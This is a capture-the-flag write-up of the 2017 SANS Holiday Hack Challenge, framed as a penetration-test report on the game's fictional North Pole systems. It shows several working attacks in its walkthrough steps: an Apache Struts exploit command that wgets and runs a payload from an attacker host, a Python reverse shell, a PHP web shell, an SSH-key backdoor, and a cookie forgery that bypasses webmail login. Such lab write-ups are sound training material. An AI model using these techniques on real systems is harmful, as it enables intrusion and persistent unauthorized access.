The 2017 SANS Holiday Hack Challenge

Penetration testing Report

Presented by wfischer (e.g. Wayne Fischer)

 Answers to Questions
1. Objective 1 Question: What is the title of that page?
About this Book
2. Objective 2 Questions:
a. What is the topic of The Great Book page available in the web root of the server? Flying Animals and
their origin and destination (Lion, Monkeys, and Reindeer) as well as the root cause of Rudolph’s
nose.
b. What is Alabaster Snowball's password? stream_unhappy_buy_loss
3. Objective 3 Question: What is the file server share name?
FileStor
4. Objective 4 Question: What can you learn from The Great Book page found in an e-mail on that server?
Tensions between Elves and Munchkins after The Great Schism, resulted in the rise of undercover munchkins
from a band of commandos named the “Lollipop Guild” who are rumored to be among North Pole elves. The
moles are believed to engage in cyber and kinetic offensive operations in the North Pole.
5. Objective 5 Questions:
a. How many infractions are required to be marked as naughty on Santa's Naughty and Nice List?
Four or more infractions are required.
b. What are the names of at least six insider threat moles?
i. Boq Questrian
ii. Bini Aru
iii. Beverly Khalil
iv. Manuel Graham
v. Nina Fitzgerald
vi. Sheri Lewis
c. Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?
The Abominable Snow Monster, Sam the Snowman and I discovered this while thwarting Snowballs,
but something ain’t right with that Snow Monster guy.
6. Objective 6 Question: What is the title of The Great Book page?
The Dreaded Inter-Dimensional Tornadoes
7. Objective 7 Question: What does The Great Book page describe?
That witches live in Oz solely, they travel in bubbles or on brooms and they remained neutral during the Great
Schism.
8. Objective 8 Question: Who wrote the letter? The Wizard of Oz.
9. Which character is ultimately the villain causing the giant snowball problem, what is the villain's motive?
Glinda the “good” Witch is responsible as she hopes to sell weapons to the warring Munchkins and Elves of
the North Pole and profit from their war.
 Introduction

This year, Santa and his miniature mafia were besieged by rumbling, tumbling snowballs of fury and information systems
were wacky-a-doodle as well! Not to mention Rudolph was nowhere to be found after having left a snarky letter. An
Inter-Dimensional Tornado splattered the Great Book all over, and we needed to help piece that back together as well.
Needless to say, Santa, the Elves, and the North Pole have a big undertaking to perform this time of year and they also
really wanted to step up their computing game. Thus, they introduce us to a modern computerized systems ranging
from a new public website for “Letters to Santa”, webmail, internal directory service as well as various “CranberryPi” (a
Linux Distribution) systems which help the elves keep everything running smoothly. Their computer whiz extraordinaire,
Alabaster Snowball, an elf full of computing talent (and hot air as well) configured and coded many of the automated
systems and attempted to secure them. Unfortunately, as is often the case, rushing systems into production and failing
to perform code reviews and proper change control resulted in missing some attacker nuggets which ultimately led to
multiple breaches and penetration throughout the systems.

This report summarizes the penetration testing which occurred, and helps Santa and the Elfish Empire recover the Great
Book pages, discover the miscreant behind the sinister plot of snow ball-ageddon involving a particular greedy witch,
and Munchkin Moles. The allegedly “good” witch will be brought to justice. She ultimately leveraged North Pole Elf and
Oz Munchkins’ hysterical, err, historical rivalry between to line her pockets with fat wads of Christmas Cash and
Emeralds.

Scope of Penetration Test

The Claus’ and Elves of the North Pole authorized the following systems and networks to be included in the penetration
test. Information was initially provided by Sam The Snowman in a public cry for help at the website
https://holidayhackchallenge.com/2017/. Here my fellow pen-testers and I were able to sign up in Santa’s service and
begin assisting the elves with Linux administration, collect evidence, and other pertinent information, assist with
preventing snowballs of destruction from raining freezing death on the North Pole and keeping track of our exploits;
errr, I mean aide.

Systems within Scope were the following:

1) https://l2s.northpolechristmastown.com/
2) Internal 10.142.0.0/24 network accessible via the l2s site.
3) Authorized to download data from http://nppd.northpolechristmastown.com but not exploit it.
4) Authorized to use/download data, but not exploit any of the North Pole and Beyond puzzler, chat, and video
game components of the Holiday Hack Challenge
 Solutions
Objective 1 Solution
Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great
Book using a giant snowball.

Visiting the North Pole and Beyond at https://2017.holidayhackchallenge.com/ and clicking Play we see the scope of the
snow ball conundrum. We also happen to find the first page of The Great Book just laying around but see now obvious
way to get the snowball to obtain it. We must use some tools to redirect snowballs to obtain the first page.
Unfortunately, we have no tools, but an Elf, Bushy Evergreen (https://twitter.com/GreenestElf), offers hints and a tool if
we can help him with this Terminal issue in the CranberryPi at this level. Let’s do that.

Terminal 1 Solution
Bushy has lost the elftalkd binary and needs help finding and running it. First I look in local folder with an ls –la to see if
it’s just a hidden file and see what’s here. Nothing, okay let’s find out what “flavor” of Linux CranberryPi is by issuing a
uname –a command which will tell us some system information.

elf@e914b2487ea8:~$ uname -a

Linux e914b2487ea8 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3 (2017-12-03) x86_64

x86_64 x86_64 GNU/Linux

Great this tell us we’re running a Debian flavor of Linux. Let’s try some POSIX standard commands to find a file.

find = Error, cannot execute binary file…hmm.

locate elftalkd = nothing
whereis elftalkd = nothing
which elftalkd = nothing
Okay let’s try to find “find”.

elf@e914b2487ea8:~$ whereis find

find: /usr/bin/find /usr/local/bin/find /usr/share/man/man1/find.1.gz
/usr/share/info/find.info.gz

Excellent, we have a copy in /usr/bin/find too. Let’s try to use that to search for a binary and grep output to show
“elftalkd” to search the entire root (e.g. /) mount and sub-directories for binary type files and limit output to any hits
with elftalkd. Ahh we see an elftalkd file in /run/bin/

elf@e914b2487ea8:~$ /usr/bin/find / -executable -type f 2>/dev/null | grep elftalkd

/run/elftalk/bin/elftalkd
There she is, okay execute the binary with
/run/elftalk/bin/elftalkd ….and she starts..You’re welcome Bushy. Bushy provides us our first tool, a
Snowball which we use to redirect the snowballs in the Winter Landing and get The Great Book page 1.
Objective 2 Solution
Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com.

Well because I had such an easy time with that first CranberryPi terminal issue, I figured I would checkout level 2 and try
to get another tool as well as check out Sparkle Redberry’s terminal (https://twitter.com/GlitteryElf) to get hints in the
Winconceivable: The Cliffs of Winsanity Level and hopefully get some information about the l2s website. FYI, solving this
terminal yielded A LOT of hints, way to fail at social engineering Sparkle!

Sparkle Hints: There is a development version of the l2s site. It was rushed and moved to production and comments
“marked” as hidden so it may have some development content on the production site. The site backend is using Apache
Struts. Sparkle likes web shells which are a great backdoor/remote access. A simple web shell can be used using PHP.
php echo "<pre>" . shell_exec($_GET['e']) . "</pre>"; ?> Sparkle kindly shares a PHP web shell github
repo. Equal-Facts Inc. is similar to another big company which in 2017 was exploited via an Apache Struts exploit that
Alabaster tested for (CVE-2017-5638). Ed Skoudis wrote up a way to exploit XML via Apache Struts. Developer’s hard
code credentials in development files. Avoid this and reusing passwords for different services.

Piecing together these clues it seems like maybe a web shell would be a great idea to gain access to the l2s system.
While Sparkle pushes us heavily toward using PHP, I prefer Python because I just started working with it and I wanted to
stick with it for now.

Visiting https://l2s.northpolechristmastown.com in a regular browser we can see it looks pretty nice. A little boy or girl
can enter some of their information and click “Send Letter to Santa” to send him a letter. Right-clicking on the page with
my mouse and selecting “View Source” I can look at the source code.

In the source code I noticed a comment line and hidden link element in the code:
<!-- Development version -->
<a href="http://dev.northpolechristmastown.com" style="display: none;">Access Development Version</a>

Visiting this plainly shows "Powered By: Apache Struts" at the bottom, confirming Sparkle’s hint.

Ed Skoudis posted a nice Blog https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-

publicly-released-exploit-code and provided a Python Script, but we need to tinker with the XML payload, and
understand where to send it. Well, I could’ve done that, but chances are someone’s already made an exploit for a recent
struts vulnerability using python which does encoding for me. So I’ll try searching for that. I managed to find one by
chrsjd20 on Github which will work just nicely to exploit CVE-2017-9805; one that Alabaster may not have tested, at
https://github.com/chrisjd20/cve-2017-9805.py/blob/master/cve-2017-9805.py

Setup: On my own public facing penetration virtual server, I login and setup a net cat listener on port 8080 (make sure
firewall allows 8080). The –nvvlp means no resolving hosts, extra verbose output, on local port 8080.
nc -nvvlp 8080
Then I setup and copy my python shell to /var/www/html of my attacker system web server, start my attacking web
server’s Apache service. My web server is up because I’m going to inject a command using the Apache Struts
vulnerability/exploit code to change directory (cd) to /tmp then wget (pull) this Python shell from my web server then
execute it so that my hosting server will accept the connection and provide a shell from my attacker server on the
Apache struts system.
Exploit Usage: cve-2017-9805.py –u URL –c command
Target URL https://dev.northpolechristmastown.com/orders/

My Exploit Command: python pyExploit.py -u

https://dev.northpolechristmastown.com/orders -c "cd /tmp && wget
http://1.2.3.4/pyshell.py && /usr/bin/python pyshell.py"
Python Web Shell
Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet has pre-made shell scripts and is a great
penetration testing site in general. I borrowed its Python shell script and used it for my payload and called it pyShell.py.

import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect
(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

This works and I’m now able to look around the system.
/bin/whoami
alabaster_snowman
ls /home/alabaster_snowman/.ssh/authorized_keys
alabaster_snowball@hhc17-apache-struts2:~/.ssh$ ls -la
/home/alabaster_snowball/.ssh/
total 68
drwx------ 2 alabaster_snowball alabaster_snowball 4096 Dec 18 00:53 .
drwxr-xr-x 3 alabaster_snowball alabaster_snowball 4096 Dec 16 01:03 ..
-rw-r--r-- 1 alabaster_snowball alabaster_snowball 1177 Dec 18 01:25
authorizedkeys
-rw-r--r-- 1 alabaster_snowball alabaster_snowball 25436 Dec 18 01:08
authorized_keys
-rw------- 1 alabaster_snowball alabaster_snowball 1675 Dec 17 19:48 id_rsa
-rw-r--r-- 1 alabaster_snowball alabaster_snowball 404 Dec 17 19:48 id_rsa.pub
-rw-r--r-- 1 alabaster_snowball alabaster_snowball 222 Dec 18 00:53 known_hosts
-rw-r--r-- 1 alabaster_snowball alabaster_snowball 1998 Dec 17 13:56
known_hosts.back
-rw------- 1 alabaster_snowball alabaster_snowball 4216 Dec 18 00:27
known_hosts.old

So we know who the user account is, alabaster_snowball. Let’s setup persistence by generating my own pub/private key
for public key logon and append it to ~/.ssh/authorized_keys using alabaster_snowball as username and then log in via
SSH proper.
cat <my public rsa key> >> /home/alabaster_snowball/.ssh/authorized_keys
Now I can login to SSH using alabaster_snowball and a public/private key to authenticate! No need to know the
password yet. But just in case, it may come in useful. Let's try to see if Sparkle’s other clue about reusing passwords in
services make sense.
First I try to search home directory for passwords in files that people sometimes leave..
/bin/grep -ir alabaster
Nothing in the output looks particularly interesting. Let's look in folders which commonly have services, after all, I know
that the apache service was running as alabaster_snowball, maybe we'll get lucky.
/bin/grep -ir alabaster /opt
One hit (file OrderMySQL.class) looks promising, because it actually looks developmental, and has a username string
/opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class: final
String username = "alabaster_snowball";
Let's see what's in there..it may be a DB connection with username and password
grep -i pass /opt/apache-tomcat/webapps/ROOT/WEB-
INF/classes/org/demo/rest/example/OrderMySql.class
final String password = "stream_unhappy_buy_loss";
String connectionURL = "jdbc:mysql://" + host + ":3306/db?user=;password=";
connection = (Connection) DriverManager.getConnection(connectionURL,
username, password);
Okay, that's most certainly a password. I test it via an SSH login with that password and it works.
Bingo. We have a password reused. And now the password as well as an SSH key.

Terminal 2 Solution
Sparkle needs help killing a process named “santaslittlehelperd” so let’s see what we get when we issue a ps (process
list) command with a –A argument to show all information.

elf@f9617cb28ded:~$ ps -A
PID TTY TIME CMD
8 pts/0 00:00:00 santaslittlehel
11 pts/0 00:00:00 kworker
12 pts/0 00:00:00 bash
18 pts/0 00:00:00 kworker
71 pts/0 00:00:00 ps
We can see it has a process id of 8. The safest way to kill a process is to issue a kill -15 <pid> followed by a kill
-1 <pid> and finally the least secure way of killing a process is by issuing a kill -9 <pid>. None of these work.
Hmm…How about trying to kill it from within the top ability.

top - 23:07:21 up 15 days, 5:02, 0 users, load average: 0.07, 0.11, 0.17
Tasks: 6 total, 1 running, 5 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.0 us, 0.2 sy, 0.0 ni, 99.8 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 14782580 total, 10712440 free, 1463520 used, 2606620 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 12435100 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
18 elf 20 0 71468 26564 9348 S 0.3 0.2 0:00.30 kworker
1 elf 20 0 18028 2852 2628 S 0.0 0.0 0:00.03 init
8 elf 20 0 4224 728 656 S 0.0 0.0 0:00.00
santaslittlehel
11 elf 20 0 13528 6376 1392 S 0.0 0.0 0:00.08 kworker
12 elf 20 0 18248 3204 2844 S 0.0 0.0 0:00.00 bash
33 elf 20 0 36668 3096 2632 R 0.0 0.0 0:00.00 top
Pressing K brings up PID to signal/kill [default pid = 1]
It’s asking for the Process ID. We know it is 8 from before. So enter 8 for the PID for santaslittlehel
Send pid 8 signal [15/sigterm]
This prompt asks what signal to send, leave the default 15/sigterm and press enter. We see the process close.
Viola, we have our hints, and a new tool for the snowball games!
So why did using top work? If we look in the bash shell .bashrc file for alias we’ll see the following
elf@23131c5281cd:~$ grep alias .bashrc
alias kill='true'
alias killall='true'
alias pkill='true'
alias skill='true'
Oops! Setting each of those vital binaries to an alias of ‘true’ will return…nothing! So that’s why when we type the
commands to kill a process we see an empty line. Another way to kill the process is to use an absolute path which will
bypass alias such as
elf@23131c5281cd:~$ /bin/kill <pid> <signal>
Objective 3 Solution
The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using
your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. Holy Evergreen
(https://twitter.com/GreenesterElf) may have some hints for us too, so let’s go try the terminal in her level.

Holly Hints: Holly provides a lot of hints. She reminds us that we can use SSH to port forward from our attacker system
through the compromised l2s site onto another internal system. She also provides a link to a guide for Linux
(https://help.ubuntu.com/community/SSH/OpenSSH/PortForwarding) and Windows
(https://blog.devolutions.net/2017/04/how-to-configure-an-ssh-tunnel-on-putty.html). Then she tells us how to link
SMB ports with a command instruction. Finally, she tells us how to use smbclient to interact with a Windows server on
Linux. This will all come in handy.

We know we have a Windows Server storing documentation and correspondence. We will want to do a system and port
discovery scan and keep an eye out for SMB. Let's see if we have nmap available on our l2s server…
alabaster_snowball@hhc17-apache-struts2:~$ /usr/bin/whereis nmap
nmap: /usr/bin/nmap /usr/share/nmap /usr/local/rbin/nmap
/usr/share/man/man1/nmap.1.gz

Ooh it's at /usr/bin/nmap yay. Time to scan for SMB port 445

alabaster_snowball@hhc17-apache-struts2:~$ nmap –PS445 10.142.0.0/24

We have got system named hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7); Seems like our file server. Let's
try to connect by creating a linked SSH tunnel connection to port 445 on 10.142.0.7 which is run through our
compromised l2s server. Then we can run smbclient against it from our attacker machine. This –L command will forward
any port 445 requests sent to attacker machines local 445 port on through the SSH tunnel to the 10.142.0.7 system.

ssh -L 445:10.142.0.7:445 alabaster_snowball@35.185.84.51

root@kali:~/Documents/HHC2017# smbclient -L 127.0.0.1 -U alabaster_snowball

Enter WORKGROUP\alabaster_snowball's password:

Viola we have some shares. Ooh FileStor, that looks interesting
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
FileStor Disk
IPC$ IPC Remote IPC

Okay, we found a network share named FileStor. This may have valuable information on it, so we’re going to try and
connect to it so that we can view what’s in this store using our alabaster_snowball username and password. In order to
do that we’re first going to create a link on our local Kali attacker system. This system already has a linked SSH tunnel the
the SMB mounts port (445) through a local port (4445). To create a location locally to view it we do a mkdir
/mnt/<localName>. Then we’ll use the mount command to link the /mnt/<localName> directory to the remote FileStor
share.
So let’s setup a new SSH tunnel linking port 4445 to remote port 445 on the SMB server then mount and see what’s in
that folder (assuming we have access)
ssh -L 4445:10.142.0.7:445 alabaster_snowball@35.185.84.51
mkdir /mnt/filestore
mount -t cifs //10.142.0.7/FileStor /mnt/filestore/ -o
ro,username=alabaster_snowball,password=stream_unhappy_buy_loss,nodev,ip=127.0.0.
1,port=4445
cd /mnt/filestore
ls -la
root@kali:/mnt/filestore# ls -la
total 1712
drwxr-xr-x 2 root root 4096 Jan 2 20:30 .
drwxr-xr-x 4 root root 4096 Dec 19 15:37 ..
-rwxr-xr-x 1 root root 255520 Dec 6 13:44 'BOLO - Munchkin Mole Report.docx'
-rwxr-xr-x 1 root root 1275756 Dec 4 11:21 GreatBookPage3.pdf
-rwxr-xr-x 1 root root 133295 Dec 6 13:47 'MEMO - Password Policy
Reminder.docx'
-rwxr-xr-x 1 root root 10245 Nov 30 11:42 'Naughty and Nice List.csv'
-rwxr-xr-x 1 root root 60344 Dec 6 13:51 'Naughty and Nice List.docx'

Looky there, we have some interesting files, and The Great Book page 3! We’ll just keep those for later with a copy to
my home directory and….*YOINK*

cp * ~/

Terminal 3 Solution
Holly Evergreen is having problems starting up the candy cane striper. Our goal is to run the executable called
“CandyCaneStriper”. Let’s take a look at its properties first.

elf@8fa04fe81f92:~$ ls -la
total 68
drwxr-xr-x 1 elf elf 4096 Dec 15 20:00 .
drwxr-xr-x 1 root root 4096 Dec 5 19:31 ..
-rw-r--r-- 1 elf elf 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 root root 3143 Dec 15 19:59 .bashrc
-rw-r--r-- 1 elf elf 655 May 16 2017 .profile
-rw-r--r-- 1 root root 45224 Dec 15 19:59 CandyCaneStriper
elf@8fa04fe81f92:~$ chmod +x CandyCaneStriper

Oh it’s not executable, we don’t own it, and trying to chmod +x (to make it an executable) on it doesn’t work or give
output. Umm…is chmod broken?

elf@8fa04fe81f92:~$ whereis chmod

chmod: /bin/chmod /usr/share/man/man1/chmod.1.gz
elf@8fa04fe81f92:~$ ls -la /bin/chmod
-rwxr-xr-x 1 root root 0 Dec 15 20:00 /bin/chmod
elf@8fa04fe81f92:~$

Alas, chmod it is broken, as its zero length means it’s an empty file. We’re going to have to take ownership, make it
executable without chmod, and run it. This explains Holly’s not so jolly problem. First problem is easy, we can make a
copy of the CandyCaneStriper that will be owned by us. The chmod is a little trickier but there are other ways to do this
directly. We can use a POSIX standard programming language called Perl. POSIX standard operating systems will have
specific programs, files, and utilities on them. Perl happens to be one of those programs. So we’re going to use that to
do a chmod() system call (which is what the chmod binary does) then run a copy of our program.

elf@8fa04fe81f92:~$ cp CandyCaneStriper CandyCaneStriper2

elf@8fa04fe81f92:~$ perl -e 'chmod 0755, "CandyCaneStriper2"'
elf@8fa04fe81f92:~$ ./CandyCaneStriper2
_..._
.'\\ //`,
/\\.'``'.=",
/ \/ ;==|
/\\/ .'\`,`
/ \/ `""`
/\\/
/\\/
/\ /
/\\/
/`\/
\\/
`
The candy cane striping machine is up and running!

And we’ve done it! Let’s see our hints and tools!
Objective 4 Solution
Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at
http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that
server?

On this challenge I put me through more pain than needed as I really didn’t analyze the code to the level where I 100%
understood the flow and process, and the result was, I was going WELL past what I needed to do to gain access. The
hints were key here. So the first thing I did was the Terminal Challenge in the “There’s Snow Place Like Home” level. I
joined a Slack chat channel at this point and every person who “aided” me just kept telling me look at the hints.
Understand the hints. I thought I did, but I didn’t understand the code and the hints. Code+Hints = access.

Pepper Minstix Hints: There may be some development files that Alabaster was trying to keep from search engine
indexers. The system uses AES256, and alabaster came up with “his own” encryption scheme. The scheme, during
decryption, takes the first 16 bytes and uses them as the Initialization Vector (IV) which are combined with the secret
key to decrypt the remaining bytes in the string. Pepper then says he’s not sure what would happen if we only encrypted
16 bytes. Finally, Pepper goes off on some rant about cookies. Hinting that we need to look at/use cookies. Let’s get
started.

Setup

During my initial nmap scan I wrote down all hosts found. One was named mail. That’s gotta be EWA.

It shows port 22, 80, 143, 2525, and 3000 open. Since we know its webmail. Let’s setup an SSH link to 10.142.0.5 at port
80.

I’ve pointed port 8080 locally, at mails port 80. Now to browse it by configuring my FireFox instance to direct web traffic
to port 8080. In Kali version 2017-3 I open Firefox, click the Menu, go to Advanced click “Settings” for Connection and
set the Manual Proxy configuration like so:

Then I browse to http://mail.northpolechristmastown.com which is the hostname and typically mail web servers are
configured to answer URL’s directed at a similar hostname. This works and I am presented with a login prompt! Using
alabaster_snowball and the password doesn’t work. Uh, now what? Okay well remember our hints. Something about
development files and hiding them from search indexers. Let’s use a reconnaissance tool against the site using a Kali
tool, nikto.

I’ll need to pass nikto some additional arguments because we’re doing some SSH tunnel fudgery. So I execute the

following:

nikto yields good information about the site. For starters, there is a cookie.txt file and robots.txt file, we should
examine. Also there are many protection flags not set. Let’s look at robots.txt and cookie.txt since the hint mentioned
web crawlers and robots.txt is usually what they use by pointing our proxy configured browser to site/robots.txt and
site/cookie.txt

Robots.txt has two lines User-agent: * and Disallow: /cookie.txt Hmmm, why disallow cookie.txt it must be nice.

Cookie.txt has the jackpot. Alabaster, you adorable fool, you gave us all the information we needed to pwn you. How
you make your cookie, how you check your cookie, that you’re using node.js on the backend. This combined with the
other hints may just give us access.

We can see that the cookie_maker creates a cookie named IOTECHWEBMAIL which has a JSON format with three
key/value pairs -> name:username, plaintext:plaintext, and ciphertext:ciphertext.

Then the cookie is checked by comparing plaintext to the cookie.plaintext. Let’s try to login to the site again and review
the cookie made with Firefox Web Developer tools.

When we try to login it tells us the format for a username if we put in an incorrect format, so we’ll need to use
alabaster.snowball@northpolechristmastown.com
but we don’t see the action (where the click sends the data). Reviewing the source code of the page, I see an interesting
script in the js/ folder named custom.js. Let’s look at that. We see three sections.

1) Common Initializations 2) LOGIN FORM and 3) Pulling User Mail

LOGIN FORM is definitely our target. Here’s the code where we see the code checks email and password for formatting,
and then the results are posted to a login.js which returns true then redirects us to /account.html.

So we know where we need to visit once we have our cookie setup and we know username is in the
firstname.lastname@northpolechristmastown.com format and we know how Alabaster is doing his encryption checking
because of the hints. Also the cookie.txt describes how long our cookie cipher text needs to be. …When decoded this 21
bytes in total length. 16 bytes for IV and 5 byte of random characters. Let’s build a cookie. We can see in FireFox’s Web
Developer tools a cookie named EWA is created and has the values {"name":"GUEST","plaintext":"","ciphertext":""}
which obviously doesn’t work. We have to get the plaintext in the cookie to match the plaintext being checked by the
login.js action and make sure a legitimate username is in the cookie, not GUEST. So let’s put in alabasters username
formatted correctly, and pass just enough ciphertext so that when processed it will be nothing! Then nothing will be
nothing and we can get in. We’ll do 16 for IV, and 5 for the random text portion.

{"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"0123456789ABCDEF"}

So I’ve set the cookie values in FireFox Web Developer with alabasters properly formatted username, and a 21 character
ciphertext which will have the first 16 bytes (0-F) pulled out for IV, then use the remaining for the plaintext. Then I’ll just
go directly to http://mail.northpolechristmastown.com/account.html and when it checks the cookie it’ll be good. But
this doesn’t work. Why?

Let’s go learn more about this node.js aes256 module that the cookie.txt spoke about..Google “node.js aes256.encrypt”
and we find a Node.js module named aes256. Eww, it’s out of date. It also has a github repo where we can look at the
source code at https://github.com/JamesMGreene/node-aes256 which is good to know.
I can see in the index.js the following Initialization vector info.

And, umm, it’s got a 0 to 16 slice, and JavaScript starts counting at zero. A count from 0 to 16 is a total of 17 bytes. We
need 17 bytes of IV data plus 5 bytes of random for this to work properly. Damnit Alabaster! Get your story straight next
time you drop hints to Pepper Mintstix! Our total ciphertext needs to be 22 bytes long!

Set our cookie to

{"name":"alabaster.snowball@northpolechristmastown.com”,"plaintext":"","ciphertext":"0123456789ABCDEF012345"}

Browse to /account.html again and we’re in as alabaster.snowball. Guess what? This works for any user as we bypass
password checking all together; we can read everyone’s mail. Yay Alabaster for poor implementation. Crypto is strong.
Implementations are what fail. Searching through the mail we get all sorts of tasty nuggets of reconnaissance
information, as well as a Great Book page 4! We’ll write that information down and save them for later. Lots of email to
read here.
Terminal 4 Solution

And there you have it. We’ve got some crashed program named trainstartup which won’t run. MMMkay, let’s run it.

elf@8a6f7bcc901c:~$ ./trainstartup
bash: ./trainstartup: cannot execute binary file: Exec format error

Damn. We can’t execute it the easy way. You Elves and your tinkering! Stick to shoes and toy building! So..umm…what
kind of file is this? We can use the file command to identify the type of binary/file we have, let’s do that.
elf@8a6f7bcc901c:~$ file trainstartup
trainstartup: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux),
statically linked, for GNU/Linux 3.2.0,
BuildID[sha1]=005de4685e8563d10b3de3e0be7d6fdd7ed732eb, not stripped

Hmm, interesting, it says ARM in the file. ARM is a different type of processor. If I check this system it’s not an ARM
system.

Linux 8a6f7bcc901c 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3 (2017-12-03) x86_64

x86_64 x86_64 GNU/Linux

So we need to run an ARM architecture on an x86_64 bit system. Whenever you need to run a program on a different
architecture, you typically need a program called an emulator. Emulators perform the code interpretations and
modifications so that a program will run on a different type of processor, because all processors do is take specific
commands, from a specific list of commands, and then process the bits. So let’s see if we have a common Linux ARM
emulator on here called QEMU. A google search for Linux ARM emulator will show you this as well as other emulators. I
know that QEMU is available in Debian distributions. We just need to find and see if it’s here. Which it, or another
emulator, must have been if the program was running before.

elf@8a6f7bcc901c:~$ find / -executable -name *qemu*

/usr/bin/qemu-arm
The find command, starting at the root (/) level looking for executables with the name *qemu* (* is a wildcard for any
other character/number) yields fruit! We get a whole list of QEMU emulators in the /usr/bin directory. Let’s try running
it with a /usr/bin/qemu-arm trainstartup

elf@8a6f7bcc901c:~$ /usr/bin/qemu-arm trainstartup

And it works! Yay we get more hints and another tool to make our games easier!
Objective 5 Solution
This objective was more data crunching, puzzle piecing etc. to answer the questions. Using all the data we’ve gathered
from the SMB fileshare, and emails and hints plus the ol’ North Pole Police Departments website infraction data
available at https://nppd.northpolechristmastown.com we can get pretty good guesses who are culprits are to answer
the questions. Minty Candycane (https://twitter.com/SirMintsALot) provides hints by helping them with Terminal 5.

First we solve the Terminal, to get tools and hints! Then pull infraction data from the nppd website and use the other
hints from email and SMB, and great book stories to figure out who moles are.

How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at
least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain and what is your
proof?

Minty Candycane Hints: Minty is the GDPR compliance officer who handles privacy requests related to Santa’s naughty
and nice list. He store it on the file store server. The NPPD labels mild infractions 1 through 5 coals. He had to break up a
fight which involved a “super atomic wedgie” and was later told those involved were Munchkin moles. Then mentions
that JSON is easy to programmatically send data back and forth over a network and that there are simple import/export
features in most programming languages. Also you can easily edit data files with any text editor and use online services
but sometimes the JSON files need a little coaxing to format for conversions.

We already have the Naughty and Nice list from the FileStor share earlier. Conveniently in .csv format. I imported this
into Excel and sorted by Naughty/Nice to get a list of Naughty persons. We also have a BOLO document which identifies
two Elves as Munchkin Moles.

Evidence:

 Naughty List has 81 Naughty peoples.

 We need infractions from the website to see what they did. We can pull this data in JSON format by searching
the nppd website’s infraction list. An easy way to pull relevant data for the last 7 years is to do this query and
download the data in JSON format with the “Download” link at the very bottom of the site and we get an
infractions.json file.

 I open this in my Notepad++ file to make sure the formatting is clean. It’s not. It’s one huge line of JSON. I can
easily remove the header element: {"count": 999, "query": "date>=2010-01-01", "infractions": [ and it’s closing
elements at the end ]} and that leaves us with a cleaner JSON file to parse using https://json-csv.com/ to convert
it to a CSV to import into Excel.
 In Excel I first want to see what qualifies to get on the Naughty list. I create a worksheet and add the 81 Naughty
list folk to column A then add a new column A on my infractions and run this IF statement to label my Naughty
 and Nice persons. This is comparing the Naughty names to the names column in my Infractions then if it finds a
match it puts “yes” into my column.
o =IF(COUNTIF(Naughty!A$1:Naughty!A$100,"*"&K22&"*"),"Yes","No")
 This yields an interesting truth via a Pivot Table counting infractions. Only those with four or more infractions
are on the Naughty list. Question 1 answered.
 Finding the potential Insider Moles was a bit more crunching. We know from files we collected, The Great Book
stories and from the BOLO document that two Naughty list persons are confirmed Munchkin Moles. We also
suspect that Munchkin Moles are believed to perform cyber and kinetic operations from The Great Book Page 4.
 Pulling out all our Naughty list infractions by matching names in Excel to a new spreadsheet. Sorting by name
and comparing Bini and Boq infractions we can limit our suspected moles to those with similar infractions.
 These include, Playing with Matches, Giving super atomic wedgies, Throwing rocks (at people), Aggravated
pulling of hair, and Possession of unlicensed slingshot.
 Using a pivot table to pull name, title of infraction based on Boq and Bini’s infractions generates a list of persons
I suspect to be Munchkin Moles.
 Criteria is they each have 4 or more of these particular infractions, more than one type of infraction, and involve
kinetic (e.g. throwing/hair pulling/wedgies). This gives us the list in my Answers to Questions section. Though I
suspect we have up to eight Munchkin Moles.

Terminal 5 Solution
I’m not a fan of data crunching. This terminal challenge required us to analyze logs and determine the most popular
browser from an apache access.log file. I know from years of experience, this has been done over and over. And quite
frankly, I just search for it on google. So I read an Analyzing Apache Log Files blog from http://www.the-art-of-
web.com/system/logs/ and used a combination of awk, sed, uniq and sort to grab the browser agent.

awk -F\" '{print $6}' access.log | sort | uniq -c | sort –fr

Produces a list, with least popular at bottom. I can see something called “Dillo/3.0.5” but the rest look like application
accesses. So let’s try Dillo/3.0.5 as our answer. Woot it works. We also learn Glinda is the culprit who enchanted the
Abominable Snowman to throw snowballs to implicate MunchKin moles for war profiteering. So on to the infraction
crunching!
Objective 6 Solution
The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for
mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and
retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by
following those directions. For hints on this challenge, please consult with Sugarplum Mary
(https://twitter.com/ThePlumSweetest) in the North Pole and Beyond.

Sugarplum Mary Hints: Elf As A Service (EAAS) site is automated, teams request orders through EAAS site. EAAS site
uses XML data, and a sample request layout is available that you can download. Elves customize the XML and submit the
order. Sample XML data doesn't even include a DTD reference, XML processing can be complex. I saw an interesting
article recently on the dangers of external XML entities (https://pen-testing.sans.org/blog/2017/12/08/entity-inception-
exploiting-iis-net-with-xxe-vulnerabilities).

